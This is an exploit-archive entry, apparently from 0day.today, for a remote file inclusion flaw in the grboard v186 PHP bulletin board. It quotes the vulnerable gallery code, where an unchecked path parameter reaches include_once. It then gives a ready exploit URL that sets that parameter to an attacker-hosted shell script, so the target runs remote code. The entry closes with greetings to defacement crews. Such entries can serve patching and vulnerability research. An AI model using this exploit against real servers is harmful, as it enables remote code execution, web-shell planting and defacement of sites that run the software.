grboard v186 Remote File Include Vulnerability

2010-05-30T00:00:00
ID 1337DAY-ID-12460
Type zdt
Reporter untouch
Modified 2010-05-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================
grboard v186 Remote File Include Vulnerability
==============================================

# Author	  : untouch
# Location        : jakarta - Indonesia
# Situs           : antijasakom[dot]org, autosaved[dot]wordpress[dot]com
# Contact         : unkn0wn[dot]cr3w[at]ymail[dot]com
# Script: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
# Download: http://sirini.net/grboard/download.php?id=grskin&articleNo=82&num=1


######################################################################
#<div class="latestGalleryTitle"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>"><?php echo $latestTitle; ?></a></div>
#<?php
#// 최근갤러리에 쓰일 GD 썸네일 엔진 부르기
#include_once $path."/thumbnail.php";
#
#// 게시물 루프
#while($latest = mysql_fetch_array($getData))
#{
#	// 각 게시물당 첨부파일 첫번째 것 가져와서 처리
#	$target = $latest['no'];
#	$file = @mysql_fetch_array(mysql_query("select file_route1 from {$dbFIX}pds_save where id = '$id' and article_num = '$target'"));
#	?>
#<div class="latestGalleryPhoto"><a href="<?php echo $grboard; ?>/board.php?id=<?php echo $id; ?>&articleNo=<?php echo $latest['no']; ?>">
#<?php echo makeLatestThumb($grboard."/".$file['file_route1'], $path, $id, $grboard, 100, 100); ?></a></div>
#	<?php
#} # while
#?>
#<div class="latestGalleryClear"></div>
######################################################################

#######################################################################################################
Exploit: http://[target]/[path]/latest/sirini_gallery2_play/list.php?path=http://[shellscript]
#######################################################################################################


#Special Thanks  : 

	- Gorontalo Defacer : cr4wl3r, bl4ck_3n91n3, aries.deris, Tawon Sparta
	
	- AntiJasakom Crew : Shamus, boys_rvn1609, 5ynL0rd, kqaj, dbugr, kiddies, g4pt3k
	
	- all Indogamers Admin & Moderator
	
# Note : Don't Be Affraid to Attack Your Own Network ~







#  0day.today [2018-03-19]  #